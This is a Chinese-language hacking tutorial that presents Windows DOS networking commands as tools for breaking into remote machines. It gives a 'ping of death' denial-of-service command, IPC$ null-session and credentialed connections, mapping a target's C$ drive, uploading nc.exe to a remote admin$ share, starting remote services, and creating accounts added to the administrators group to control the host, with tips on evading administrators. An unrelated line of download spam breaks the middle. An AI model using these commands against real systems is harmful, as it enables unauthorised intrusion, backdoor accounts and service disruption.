IP攻击命令
一,ping
它是用来检查网络是否通畅或者网络连接速度的命令。作为一个生活在网络上的管理员或者黑客来说,ping命令是第一个必须掌握的DOS命令,它所利用的原理是这样的:网络上的机器都有唯一确定的IP地址,我们给目标IP地址发送一个数据包,对方就要返回一个同样大小的数据包,根据返回的数据包我们可以确定目标主机的存在,可以初步判断目标主机的操作系统等。下面就来看看它的一些常用的操作。先看看帮助吧,在DOS窗口中键入:pin g /? 回车,。所示的帮助画面。在此,我们只掌握一些基本的很有用的参数就可以了(下同)。
ping ip(或域名) (向对方主机发送默认大小为32字节的数据)
参数:“-l[空格]数据包大小”;“-n发送数据次数”;“-t”指一直ping。
ping -t -l 65550 ip (死亡之ping,发送大于64K的文件并一直ping就成了死亡之ping)
二,nbtstat
该命令使用TCP/IP上的NetBIOS显示
协议
离婚协议模板下载合伙人协议 下载渠道分销协议免费下载敬业协议下载授课协议下载
统计和当前TCP/IP连接,使用这个命令你可以得到远程主机的NETBIOS信息,比如用户名、所属的工作组、网卡的MAC地址等。在此我们就有必要了解几个基本的参数。
-a 使用这个参数,只要你知道了远程主机的机器名称,就可以得到它的NETBIOS信息(下同)。
-A 这个参数也可以得到远程主机的NETBIOS信息,但需要你知道它的IP。例如:
nbtstat -A ip 对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03
前的为用户名)注意:参数-A要大写
-n 列出本地机器的NETBIOS信息。
当得到了对方的IP或者机器名的时候,就可以使用nbtstat命令来进一步得到对方的信息了,这又增加了我们入侵的保险系数。
三,netstat
这是一个用来查看网络状态的命令,操作简便功能强大。
netstat -a 查看开启了哪些端口,可以有效发现和预防木马,可以知道机器所开的服务等信息,常用netstat -an
netstat -n 查看端口的网络连接情况,常用netstat -an
netstat -v 查看正在进行的工作
netstat -p 协议名,例:netstat -p tcq/ip 查看某协议使用情况(查看tcp/ip协议使用情况) netstat -s 查看正在使用的所有协议使用情况
netstat -r 列出当前的路由信息,告诉我们本地机器的网关、子网掩码等信息。用法:netstat -r IP。
四,tracert
跟踪路由信息,使用此命令可以查出数据从本地机器传输到目标主机所经过的所有途径,这对我们了解网络布局和结构很有帮助。用法:tracert IP
tracert -参数ip(或计算机名) 跟踪路由(数据包),参数:“-w数字”用于设置超时间隔。
五,net
这个命令是网络命令中最重要的一个,必须透彻掌握它的每一个子命令的用法,因为它的功能实在是太强大了,这简直就是微软为我们提供的最好的入侵工具。首先让我们来看一看它
都有那些子命令,键入net /?回车。
在这里,我们重点掌握几个入侵常用的子命令。
1)net view
net view(查看本地局域网内开启了哪些共享)
net view \\ip (查看对方局域网内开启了哪些共享)
2)net use
net use \\ip\ipc$ "" /user:"" (建立IPC空链接)
net use \\ip\ipc$ "密码" /user:"用户名" (建立IPC非空链接)
net use h: \\ip\c$ "密码" /user:"用户名" (直接登陆后映射对方C:到本地为H: )
net use h: \\ip\c$ (登陆后映射对方C:到本地为H: )
net use \\ip\ipc$ /del (删除IPC链接)
net use h: /del (删除映射对方到本地的为H:的映射)
把远程主机的某个共享资源影射为本地盘符,图形界面方便使用,呵呵。
建立了IPC$连接后,就可以上传文件了:copy nc.exe $">\\192.168.0.7\admin$,表示把本地目录下的nc.exe传到远程主机,结合后面要介绍到的其他DOS命令就可以实现入侵了。
3)net start
使用它来启动远程主机上的服务。当你和远程主机建立连接后,如果发现它的什么服务没有启动,而你又想利用此服务怎么办?就使用这个命令来启动吧。用法:net start servername 例如:
net start telnet,
net start schedule
4)net stop
入侵后发现远程主机的某个服务碍手碍脚,怎么办?利用这个命令停掉就ok了,用法和net start同。
6)net user
查看和帐户有关的情况,包括新建帐户、删除帐户、查看特定帐户、激活帐户、帐户禁用等。这对我们入侵是很有利的,最重要的,它为我们克隆帐户提供了前提。键入不带参数的net user,可以查看所有用户,包括已经禁用的。下面分别讲解。
net user (查看有哪些用户)
net user 用户名密码/add (建立用户,默认为user组成员。)
net user 用户名/del(将用户删除。)
net user abcd /active:no(将用户名为abcd的用户禁用。)
net user abcd /active:yes(激活用户名为abcd的用户。)
net user abcd(查看用户名为abcd的用户的情况)
7)net localgroup
查看所有和用户组有关的信息和进行相关操作。键入不带参数的net localgroup即列出当前所有的用户组。在入侵过程中,我们一般利用它来把某个帐户提升为administrator组帐户,这样我们利用这个帐户就可以控制整个远程主机了。
用法:
net localgroup administrators 用户名/add(用户名/add 把“用户”添加到管理员中使其具有管理员权限,注意:administrator后加s用复数)
但这样太明显了,网管一看用户情况就能漏出破绽,所以这种方法只能对付菜鸟网管,但我
们还得知道。现在的手段都是利用其他工具和手段克隆一个让网管看不出来的超级管理员,这是后话。
8)net time
这个命令可以查看远程主机当前的时间。如果你的目标只是进入到远程主机里面,那么也许就用不到这个命令了。但简单的入侵成功了,难道只是看看吗?我们需要进一步渗透。这就连远程主机当前的时间都需要知道,因为利用时间和其他手段(后面会讲到)可以实现某个命令和程序的定时启动,为我们进一步入侵打好基础。
用法:
net time \\目标ip (查看对方时间)
net time \\目标ip /set (设置本地计算机时间与“目标IP”主机的时间同步,加上参数/set 可取消确认信息)
9)net share(查看本地开启的共享)
net share ipc$ (开启ipc$共享)
net share ipc$ /del(删除ipc$共享,xp系统无法删除)
net share c$ /del(删除C:共享)
net share sharename=drive:path(创建共享)如:
net share c$=c: (设置c盘为共享)
10)net logoff (断开连接的共享)
11)net pause 服务名(暂停某服务)
12)net send ip "文本信息" (向对方发信息)
13)net ver(局域网内正在使用的网络连接类型和信息)
14)net config (显示系统网络设置)